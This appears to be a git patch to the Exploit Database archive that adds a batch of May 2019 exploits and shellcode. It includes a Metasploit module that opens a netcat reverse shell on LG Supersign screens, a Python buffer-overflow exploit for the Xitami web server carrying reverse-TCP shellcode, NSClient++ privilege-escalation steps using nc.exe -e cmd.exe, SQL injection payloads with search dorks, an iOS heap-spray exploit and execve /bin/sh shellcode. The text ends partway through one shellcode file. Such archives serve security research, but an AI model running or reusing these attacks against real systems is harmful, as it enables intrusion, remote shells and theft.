From 79a9df09f0adfe80975ee9b53ab0f8db8f8de414 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 7 May 2019 05:01:58 +0000 Subject: [PATCH] DB: 2019-05-07 13 changes to exploits/shellcodes iOS 12.1.3 - 'cfprefsd' Memory Corruption Windows PowerShell ISE - Remote Code Execution NSClient++ 0.5.2.35 - Privilege Escalation Windows PowerShell ISE - Remote Code Execution LG Supersign EZ CMS - Remote Code Execution (Metasploit) Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter) ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution PHPads 2.0 - 'click.php3?bannerID' SQL Injection microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes) Linux/x86 - shred file Shellcode (72 bytes) --- exploits/asp/webapps/46799.txt | 28 ++++ exploits/hardware/remote/46795.rb | 72 ++++++++ exploits/hardware/webapps/46240.html | 2 +- exploits/ios/dos/46803.c | 165 +++++++++++++++++++ exploits/multiple/webapps/46796.txt | 96 +++++++++++ exploits/php/webapps/46798.txt | 56 +++++++ exploits/windows/local/46802.txt | 63 +++++++ exploits/windows/{local => remote}/46790.txt | 0 exploits/windows/remote/46797.py | 125 ++++++++++++++ files_exploits.csv | 9 +- files_shellcodes.csv | 2 + shellcodes/generator/46800.txt | 139 ++++++++++++++++ shellcodes/linux_x86/46801.txt | 76 +++++++++ 13 files changed, 831 insertions(+), 2 deletions(-) create mode 100644 exploits/asp/webapps/46799.txt create mode 100755 exploits/hardware/remote/46795.rb create mode 100644 exploits/ios/dos/46803.c create mode 100644 exploits/multiple/webapps/46796.txt create mode 100644 exploits/php/webapps/46798.txt create mode 100644 exploits/windows/local/46802.txt rename exploits/windows/{local => remote}/46790.txt (100%) create mode 100755 exploits/windows/remote/46797.py create mode 100644 shellcodes/generator/46800.txt create mode 100644 shellcodes/linux_x86/46801.txt diff --git a/exploits/asp/webapps/46799.txt b/exploits/asp/webapps/46799.txt new file mode 100644 index 000000000..efa4deff1 --- /dev/null +++ b/exploits/asp/webapps/46799.txt @@ -0,0 +1,28 @@ +[+] Sql Injection on microASP (Portal+) CMS + +[+] Date: 05/05/2019 + +[+] Risk: High + +[+] CWE Number : CWE-89 + +[+] Author: Felipe Andrian Peixoto + +[+] Vendor Homepage: http://www.microasp.it/ + +[+] Contact: felipe_andrian@hotmail.com + +[+] Tested on: Windows 7 and Gnu/Linux + +[+] Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;) + +[+] Exploit : + + http://host/patch/pagina.phtml?explode_tree= [SQL Injection] + +[+] PoC : + + https://server/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+- + https://server/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- + +[+] EOF \ No newline at end of file diff --git a/exploits/hardware/remote/46795.rb b/exploits/hardware/remote/46795.rb new file mode 100755 index 000000000..a33952033 --- /dev/null +++ b/exploits/hardware/remote/46795.rb @@ -0,0 +1,72 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +class MetasploitModule < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'LG Supersign EZ CMS RCE', + 'Description' => %q{ + LG SuperSignEZ CMS, that many LG SuperSign TVs have builtin, is prone + to remote code execution due to an improper parameter handling + }, + 'Author' => ['Alejandro Fanjul'], + 'References' => + [ + [ 'CVE', '2018-17173' ], + [ 'URL', 'https://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.html'] + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Privileged' => false, + 'DefaultOptions' => + { + 'PAYLOAD' => 'cmd/unix/reverse_netcat' + }, + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'netcat' + } + }, + 'Targets' => + [ + [ 'Automatic Target', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Sep 21 2018' + ) + ) + register_options( + [ + OptString.new('RPORT',[true,'Target port','9080']) + ], self.class) + + end + + + def exploit + lhost=datastore['LHOST'] + lport=datastore['LPORT'] + #uri = target_uri.path + cmd = Rex::Text.uri_encode(payload.encoded) + connect + res = send_request_raw({ + 'method'=>'GET', + 'uri'=>"/qsr_server/device/getThumbnail?sourceUri='%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20"+lhost+"%20"+lport.to_s+"%20%3E%2Ftmp%2Ff;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150" + + }) + handler + disconnect + + end + +end \ No newline at end of file diff --git a/exploits/hardware/webapps/46240.html b/exploits/hardware/webapps/46240.html index 39de03d31..c33e8aecf 100644 --- a/exploits/hardware/webapps/46240.html +++ b/exploits/hardware/webapps/46240.html @@ -4,7 +4,7 @@ # Tested on: Windows 10 x64 # CVE : CVE-2019-6710 # Author : Ali Can Gönüllü -# Twitter : @god3err +# Twitter : @alicangonullu Exploits : --> diff --git a/exploits/ios/dos/46803.c b/exploits/ios/dos/46803.c new file mode 100644 index 000000000..21a14958f --- /dev/null +++ b/exploits/ios/dos/46803.c @@ -0,0 +1,165 @@ +// (c) 2019 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes +// Intended only for educational and defensive purposes only. +// Use at your own risk. + +#include +#import +#include +#include +#include +#include +#include + +#define AGENT 1 + +#define FILL_DICT_COUNT 0x600 +#define FILL_COUNT 0x1000 +#define FREE_COUNT 0x2000 +#define FILL_SIZE (0xc0) + +int need_stop = 0; + +struct heap_spray { + void* fake_objc_class_ptr; + uint32_t r10; + uint32_t r4; + void* fake_sel_addr; + uint32_t r5; + uint32_t r6; + uint64_t cmd; + uint8_t pad1[0x3c]; + uint32_t stack_pivot; + struct fake_objc_class_t { + char pad[0x8]; + void* cache_buckets_ptr; + uint32_t cache_bucket_mask; + } fake_objc_class; + struct fake_cache_bucket_t { + void* cached_sel; + void* cached_function; + } fake_cache_bucket; + char command[32]; +}; + +void fill_once(){ + +#if AGENT + xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0); +#else + xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); +#endif + + xpc_connection_set_event_handler(client, ^void(xpc_object_t response) { + xpc_type_t t = xpc_get_type(response); + if (t == XPC_TYPE_ERROR){ + printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION)); + need_stop = 1 ; + } + //printf("received an event\n"); + }); + + xpc_connection_resume(client); + xpc_object_t main_dict = xpc_dictionary_create(NULL, NULL, 0); + + xpc_object_t arr = xpc_array_create(NULL, 0); + + xpc_object_t spray_dict = xpc_dictionary_create(NULL, NULL, 0); + xpc_dictionary_set_int64(spray_dict, "CFPreferencesOperation", 8); + xpc_dictionary_set_string(spray_dict, "CFPreferencesDomain", "xpc_str_domain"); + xpc_dictionary_set_string(spray_dict, "CFPreferencesUser", "xpc_str_user"); + + char key[100]; + char value[FILL_SIZE]; + memset(value, "A", FILL_SIZE); + *((uint64_t *)value) = 0x4142010180202020; + //*((uint64_t *)value) = 0x180202020; + value[FILL_SIZE-1]=0; + for (int i=0; inull0 = 0; + hs->cmd = -1; + hs->fake_objc_class_ptr = &hs->fake_objc_class; + hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket; + hs->fake_objc_class.cache_bucket_mask = 0; + hs->fake_sel_addr = &hs->fake_cache_bucket.cached_sel; + // nasty hack to find the correct selector address + hs->fake_cache_bucket.cached_sel = 0x7fff00000000 + (uint64_t)NSSelectorFromString(@"dealloc"); + + hs->fake_cache_bucket.cached_function = 0xdeadbeef; + size_t heap_spray_pages = 0x40000; + size_t heap_spray_bytes = heap_spray_pages * 0x1000; + char* heap_spray_copies = malloc(heap_spray_bytes); + for (int i = 0; i < heap_spray_pages; i++){ + memcpy(heap_spray_copies+(i*0x1000), map, 0x1000); + } + xpc_dictionary_set_data(main_dict, "heap_spray", heap_spray_copies, heap_spray_bytes); + + //NSLog(@"%@", main_dict); + xpc_connection_send_message(client, main_dict); + printf("fill once\n"); + xpc_release(main_dict); +} + +void trigger_vul(){ + #if AGENT + printf("AGENT\n"); + xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0); + #else + printf("DAEMON\n"); + xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); + #endif + xpc_connection_set_event_handler(conn, ^(xpc_object_t response) { + xpc_type_t t = xpc_get_type(response); + if (t == XPC_TYPE_ERROR){ + printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION)); + need_stop = 1 ; + } + }); + xpc_connection_resume(conn); + + xpc_object_t hello = xpc_dictionary_create(NULL, NULL, 0); + xpc_object_t arr = xpc_array_create(NULL, 0); + + xpc_object_t arr_free = xpc_dictionary_create(NULL, NULL, 0); + xpc_dictionary_set_int64(arr_free, "CFPreferencesOperation", 4); + xpc_array_append_value(arr, arr_free); + for (int i=0; i https://twitter.com/gscamelo +# Vendor Homepage: https://smartbear.com/product/ready-api +# Software Link: https://smartbear.com/product/ready-api/overview/ +# Github: https://github.com/gscamelo/CVE-2018-20580 +# Version: 2.5.0 and 2.6.0 +# Tested on: Windows +# CVE : CVE-2018-20580 + +I found a new vulnerability in the (ReadyAPI). It allows an attacker to +execute a remote code on the local machine putting in danger the ReadyAPI +users including developers, pentesters, etc... + +The ReadyAPI allows users to open a SOAP project and import WSDL files that +help the users to communicate with the remote server easily. + +The WSDL file owner can determine default values of some parameters. An +attacker can impersonate a legitimate web service and inject a malicious +code into a default value of one of the parameters and spread it to +ReadyAPI clients. + +When a ReadyAPI client load a malicious WSDL file to his project and send a +request containing the malicious code the ReadyAPI will execute the +malicious code on the victim's computer. + +The attack scenario: + +An attacker impersonates a regular web service with a WSDL containing the +malicious code. +The victim creates a new project in the ReadyAPI and loads the malicious +WSDL File. +The victim decides to send a request to the remote server and the ReadyAPI +execute the malicious code. +The attacker succeeds in executing malicious code in the victim's machine +and take it over. +--> + + + + + + + + + + + + + + + + + + + + + + + Create a new xpl + + + + + + + + + + + + + + + + + + + + My first Exploit + + + + + + \ No newline at end of file diff --git a/exploits/php/webapps/46798.txt b/exploits/php/webapps/46798.txt new file mode 100644 index 000000000..909496bd0 --- /dev/null +++ b/exploits/php/webapps/46798.txt @@ -0,0 +1,56 @@ +[+] Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores + +[+] Date: 05/05/2019 + +[+] Risk: High + +[+] CWE Number : CWE-89 + +[+] Author: Felipe Andrian Peixoto + +[+] Vendor Homepage: https://blondish.net/ + +[+] Software Demo : https://github.com/blondishnet/PHPads/blob/master/readme.txt + +[+] Contact: felipe_andrian@hotmail.com + +[+] Tested on: Windows 7 and Gnu/Linux + +[+] Dork: inurl:"click.php3?bannerID="" // use your brain ;) + +[+] Exploit : + + http://host/patch//click.php3?bannerID= [SQL Injection] + +[+] Vulnerable File : + + + +[+] PoC : + + http://server/phpads/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- + http:/server/phpAds/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- + +[+] EOF \ No newline at end of file diff --git a/exploits/windows/local/46802.txt b/exploits/windows/local/46802.txt new file mode 100644 index 000000000..ed4f283d8 --- /dev/null +++ b/exploits/windows/local/46802.txt @@ -0,0 +1,63 @@ +Exploit Author: bzyo +Twitter: @bzyo_ +Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation +Date: 05-05-19 +Vulnerable Software: NSClient++ 0.5.2.35 +Vendor Homepage: http://nsclient.org/ +Version: 0.5.2.35 +Software Link: http://nsclient.org/download/ +Tested on: Windows 10 x64 + +Details: +When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted. + +The user is able to enable the modules to check external scripts and schedule those scripts to run. There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere. Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation. A reboot, as far as I can tell, is required to reload and read the changes to the web config. + +Prerequisites: +To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system. + +Exploit: +1. Grab web administrator password +- open c:\program files\nsclient++\nsclient.ini +or +- run the following that is instructed when you select forget password + C:\Program Files\NSClient++>nscp web -- password --display + Current password: SoSecret + +2. Login and enable following modules including enable at startup and save configuration +- CheckExternalScripts +- Scheduler + +3. Download nc.exe and evil.bat to c:\temp from attacking machine + @echo off + c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe + +4. Setup listener on attacking machine + nc -nlvvp 443 + +5. Add script foobar to call evil.bat and save settings +- Settings > External Scripts > Scripts +- Add New + - foobar + command = c:\temp\evil.bat + +6. Add schedulede to call script every 1 minute and save settings +- Settings > Scheduler > Schedules +- Add new + - foobar + interval = 1m + command = foobar + +7. Restart the computer and wait for the reverse shell on attacking machine + nc -nlvvp 443 + listening on [any] 443 ... + connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671 + Microsoft Windows [Version 10.0.17134.753] + (c) 2018 Microsoft Corporation. All rights reserved. + + C:\Program Files\NSClient++>whoami + whoami + nt authority\system + +Risk: +The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System \ No newline at end of file diff --git a/exploits/windows/local/46790.txt b/exploits/windows/remote/46790.txt similarity index 100% rename from exploits/windows/local/46790.txt rename to exploits/windows/remote/46790.txt diff --git a/exploits/windows/remote/46797.py b/exploits/windows/remote/46797.py new file mode 100755 index 000000000..05ba4e2b0 --- /dev/null +++ b/exploits/windows/remote/46797.py @@ -0,0 +1,125 @@ +# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (SEH + Egghunter) +# Date: May 4, 2019 +# Author: ElSoufiane +# Version: 2.5b4 +# Tested on: Windows Vista Ultimate (Build 6000) and Windows XP SP3 Professional +# Discovered by: Krystian Kloskowski +# +# Set up a multi handler listener in MSFConsole +# then run exploit +# +# root@f6c9fa91b403:~/XitamiWebServer# python exploit.py 192.168.1.149 +# [+] Sending exploit payload... +# +# Check the MSFConsole listener +# +# msf5 exploit(multi/handler) > run +# [*] Started reverse TCP handler on 0.0.0.0:5801 +# [*] Encoded stage with x86/shikata_ga_nai +# [*] Sending encoded stage (267 bytes) to 172.17.0.1 +# [*] Command shell session 6 opened (172.17.0.2:5801 -> 172.17.0.1:39416) at 2019-05-04 00:17:55 +0000 + + + +# C:\Xitami> + +import socket +import sys +import struct + +if len(sys.argv) != 2 : + print "[+] Usage : python exploit.py [VICTIM_IP]" + exit(0) + +TCP_IP = sys.argv[1] +TCP_PORT = 80 + + +egg = "SOUFSOUF" +nops = "\x90"*10 + +#msfvenom -p windows/shell/reverse_tcp LPORT=5801 LHOST=192.168.1.129 -f python -v shellcode -e x86/alpha_mixed +shellcode = "\x89\xe0\xd9\xe5\xd9\x70\xf4\x5b\x53\x59\x49\x49" +shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43" +shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" +shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +shellcode += "\x69\x6c\x68\x68\x6c\x42\x63\x30\x37\x70\x63\x30" +shellcode += "\x51\x70\x6b\x39\x6d\x35\x70\x31\x6f\x30\x70\x64" +shellcode += "\x4e\x6b\x76\x30\x70\x30\x4e\x6b\x76\x32\x54\x4c" +shellcode += "\x6e\x6b\x72\x72\x46\x74\x6c\x4b\x53\x42\x55\x78" +shellcode += "\x34\x4f\x4e\x57\x42\x6a\x35\x76\x30\x31\x59\x6f" +shellcode += "\x4e\x4c\x77\x4c\x70\x61\x31\x6c\x75\x52\x34\x6c" +shellcode += "\x35\x70\x6b\x71\x38\x4f\x56\x6d\x47\x71\x4a\x67" +shellcode += "\x4a\x42\x49\x62\x63\x62\x63\x67\x6e\x6b\x63\x62" +shellcode += "\x52\x30\x4c\x4b\x53\x7a\x77\x4c\x6e\x6b\x70\x4c" +shellcode += "\x72\x31\x31\x68\x59\x73\x30\x48\x53\x31\x68\x51" +shellcode += "\x72\x71\x4e\x6b\x30\x59\x57\x50\x55\x51\x6e\x33" +shellcode += "\x4c\x4b\x73\x79\x72\x38\x48\x63\x56\x5a\x62\x69" +shellcode += "\x4c\x4b\x66\x54\x6c\x4b\x73\x31\x49\x46\x64\x71" +shellcode += "\x4b\x4f\x6c\x6c\x5a\x61\x68\x4f\x66\x6d\x77\x71" +shellcode += "\x69\x57\x30\x38\x4b\x50\x74\x35\x58\x76\x55\x53" +shellcode += "\x71\x6d\x6b\x48\x55\x6b\x73\x4d\x44\x64\x32\x55" +shellcode += "\x4a\x44\x43\x68\x4c\x4b\x70\x58\x31\x34\x65\x51" +shellcode += "\x4a\x73\x62\x46\x4e\x6b\x54\x4c\x52\x6b\x6e\x6b" +shellcode += "\x33\x68\x37\x6c\x43\x31\x4b\x63\x6e\x6b\x34\x44" +shellcode += "\x6c\x4b\x43\x31\x4a\x70\x4c\x49\x37\x34\x37\x54" +shellcode += "\x44\x64\x51\x4b\x73\x6b\x53\x51\x52\x79\x52\x7a" +shellcode += "\x42\x71\x6b\x4f\x69\x70\x71\x4f\x43\x6f\x32\x7a" +shellcode += "\x4c\x4b\x37\x62\x7a\x4b\x4e\x6d\x71\x4d\x55\x38" +shellcode += "\x56\x53\x70\x32\x77\x70\x65\x50\x62\x48\x44\x37" +shellcode += "\x42\x53\x74\x72\x63\x6f\x43\x64\x33\x58\x42\x6c" +shellcode += "\x63\x47\x31\x36\x54\x47\x6d\x59\x6b\x58\x69\x6f" +shellcode += "\x4e\x30\x4e\x58\x4c\x50\x67\x71\x47\x70\x67\x70" +shellcode += "\x37\x59\x4a\x64\x31\x44\x56\x30\x70\x68\x55\x79" +shellcode += "\x4f\x70\x30\x6b\x63\x30\x6b\x4f\x68\x55\x61\x7a" +shellcode += "\x35\x5a\x72\x48\x39\x50\x79\x38\x45\x51\x4f\x71" +shellcode += "\x52\x48\x46\x62\x43\x30\x32\x36\x39\x39\x6c\x49" +shellcode += "\x59\x76\x36\x30\x46\x30\x36\x30\x32\x70\x51\x50" +shellcode += "\x36\x30\x67\x30\x76\x30\x32\x48\x6a\x4a\x56\x6f" +shellcode += "\x79\x4f\x39\x70\x59\x6f\x79\x45\x5a\x37\x70\x6a" +shellcode += "\x46\x70\x71\x46\x63\x67\x30\x68\x6e\x79\x69\x35" +shellcode += "\x44\x34\x30\x61\x59\x6f\x59\x45\x6d\x55\x49\x50" +shellcode += "\x53\x44\x55\x5a\x79\x6f\x30\x4e\x66\x68\x53\x45" +shellcode += "\x6a\x4c\x6a\x48\x52\x47\x73\x30\x33\x30\x73\x30" +shellcode += "\x61\x7a\x55\x50\x33\x5a\x67\x74\x71\x46\x66\x37" +shellcode += "\x62\x48\x45\x52\x68\x59\x4f\x38\x51\x4f\x59\x6f" +shellcode += "\x6b\x65\x4f\x73\x7a\x58\x53\x30\x63\x4e\x57\x46" +shellcode += "\x4c\x4b\x35\x66\x32\x4a\x63\x70\x72\x48\x63\x30" +shellcode += "\x76\x70\x65\x50\x77\x70\x73\x66\x62\x4a\x37\x70" +shellcode += "\x32\x48\x46\x38\x4e\x44\x76\x33\x79\x75\x79\x6f" +shellcode += "\x5a\x75\x6e\x73\x76\x33\x52\x4a\x73\x30\x76\x36" +shellcode += "\x42\x73\x32\x77\x33\x58\x45\x52\x78\x59\x78\x48" +shellcode += "\x61\x4f\x39\x6f\x59\x45\x4d\x53\x49\x68\x45\x50" +shellcode += "\x73\x4d\x61\x38\x71\x48\x62\x48\x55\x50\x53\x70" +shellcode += "\x35\x50\x53\x30\x33\x5a\x45\x50\x76\x30\x33\x58" +shellcode += "\x56\x6b\x34\x6f\x46\x6f\x34\x70\x4b\x4f\x78\x55" +shellcode += "\x71\x47\x75\x38\x31\x65\x70\x6e\x52\x6d\x50\x61" +shellcode += "\x4b\x4f\x79\x45\x33\x6e\x31\x4e\x4b\x4f\x44\x4c" +shellcode += "\x76\x44\x56\x6f\x4e\x65\x72\x50\x79\x6f\x69\x6f" +shellcode += "\x6b\x4f\x68\x69\x4d\x4b\x79\x6f\x79\x6f\x49\x6f" +shellcode += "\x56\x61\x5a\x63\x71\x39\x69\x56\x51\x65\x69\x51" +shellcode += "\x4f\x33\x6d\x6b\x5a\x50\x68\x35\x4e\x42\x50\x56" +shellcode += "\x52\x4a\x57\x70\x36\x33\x69\x6f\x5a\x75\x41\x41" + +egghunter ="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"+"SOUF"+"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +nseh_jmp = "\xeb\xaa" #jmp back 84 bytes +seh = "\x87\x1d\x40" # (xiwin32.exe) 0x00401d87 -> pop/pop/ret. ( Parial Overwrite ) + +payload = "A"*120 +payload += egghunter +payload += "A"*(190-len(payload)) +payload += nseh_jmp +payload += seh + +http_req = "GET / HTTP/1.1\r\n" +http_req += "Host: "+ TCP_IP +"\r\n" +http_req += "User-Agent: "+egg+nops+shellcode+"\r\n" +http_req += "If-Modified-Since: Wed, " + payload + "\r\n\r\n" + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((TCP_IP, TCP_PORT)) +print "[+] Sending exploit payload..." +s.send(http_req) +s.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 286762240..886dff79b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6408,6 +6408,7 @@ id,file,description,date,author,type,platform,port 46778,exploits/windows/dos/46778.py,"SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)",2019-04-30,"Victor Mondragón",dos,windows, 46781,exploits/linux/dos/46781.txt,"Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification",2019-04-30,"Google Security Research",dos,linux, 46793,exploits/windows/dos/46793.txt,"SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service",2019-05-03,"Dino Barlattani",dos,windows, +46803,exploits/ios/dos/46803.c,"iOS 12.1.3 - 'cfprefsd' Memory Corruption",2019-05-06,ZecOps,dos,ios, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10451,7 +10452,7 @@ id,file,description,date,author,type,platform,port 46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows, 46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows, 46779,exploits/windows/local/46779.py,"DeviceViewer 3.12.0.1 - 'user' SEH Overflow",2019-04-30,"Hayden Wright",local,windows, -46790,exploits/windows/local/46790.txt,"Windows PowerShell ISE - Remote Code Execution",2019-05-03,hyp3rlinx,local,windows, +46802,exploits/windows/local/46802.txt,"NSClient++ 0.5.2.35 - Privilege Escalation",2019-05-06,bzyo,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17377,7 +17378,10 @@ id,file,description,date,author,type,platform,port 46782,exploits/windows/remote/46782.rb,"AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)",2019-04-30,Metasploit,remote,windows, 46783,exploits/php/remote/46783.rb,"Pimcore < 5.71 - Unserialize RCE (Metasploit)",2019-04-30,Metasploit,remote,php, 46785,exploits/linux/remote/46785.rb,"Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)",2019-05-02,Metasploit,remote,linux,3000 +46790,exploits/windows/remote/46790.txt,"Windows PowerShell ISE - Remote Code Execution",2019-05-03,hyp3rlinx,remote,windows, 46792,exploits/linux/remote/46792.py,"Blue Angel Software Suite - Command Execution",2019-05-03,"Paolo Serracino_ Pietro Minniti_ Damiano Proietti",remote,linux, +46795,exploits/hardware/remote/46795.rb,"LG Supersign EZ CMS - Remote Code Execution (Metasploit)",2019-05-06,"Alejandro Fanjul",remote,hardware,9080 +46797,exploits/windows/remote/46797.py,"Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter)",2019-05-06,ElSoufiane,remote,windows,80 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41224,3 +41228,6 @@ id,file,description,date,author,type,platform,port 46787,exploits/php/webapps/46787.txt,"Instagram Auto Follow - Authentication Bypass",2019-05-03,Veyselxan,webapps,php, 46788,exploits/multiple/webapps/46788.txt,"Zotonic < 0.47.0 mod_admin - Cross-Site Scripting",2019-05-03,"Ramòn Janssen",webapps,multiple, 46794,exploits/php/webapps/46794.py,"Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution",2019-05-03,hash3liZer,webapps,php, +46796,exploits/multiple/webapps/46796.txt,"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution",2019-05-06,"Gilson Camelo",webapps,multiple, +46798,exploits/php/webapps/46798.txt,"PHPads 2.0 - 'click.php3?bannerID' SQL Injection",2019-05-06,"felipe andrian",webapps,php,80 +46799,exploits/asp/webapps/46799.txt,"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection",2019-05-06,"felipe andrian",webapps,asp,80 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 2082791b3..7ed17ea82 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -961,3 +961,5 @@ id,file,description,date,author,type,platform 46746,shellcodes/generator/46746.txt,"Linux/x86 - Rabbit Shellcode Crypter (200 bytes)",2019-04-24,"Petr Javorik",shellcode,generator 46789,shellcodes/linux_x86/46789.txt,"Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper",2019-05-03,"Dave Sully",shellcode,linux_x86 46791,shellcodes/linux_x86/46791.c,"Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes)",2019-05-03,strider,shellcode,linux_x86 +46800,shellcodes/generator/46800.txt,"Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)",2019-05-06,"Xavi Beltran",shellcode,generator +46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - shred file Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86 diff --git a/shellcodes/generator/46800.txt b/shellcodes/generator/46800.txt new file mode 100644 index 000000000..4e86fc5b1 --- /dev/null +++ b/shellcodes/generator/46800.txt @@ -0,0 +1,139 @@ +# Title: Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes) +# Author: Xavi Beltran +# Date: 05/05/2019 +# Contact: xavibeltran@protonmail.com +# Purpose: spawn /bin/sh shell +# Tested On: Ubuntu 3.5.0-17-generic +# Arch: x86 +# Size: 59 bytes + +############################################## sh.nasm ############################################### +global _start +section .text +_start: + xor eax, eax + push eax + push 0x68732f2f + push 0x6e69622f + mov ebx, esp + push eax + mov edx, esp + push ebx + mov ecx, esp + mov al, 11 + int 0x80 + + +###################################### original shellcode ############################################# +\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 + + +################################# encoder-xor-multiple-keys.py ###################################### +#!/usr/bin/python +# Autor: Xavi Beltran +# Date: 05/05/2019 + +shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") + +encoded = "" 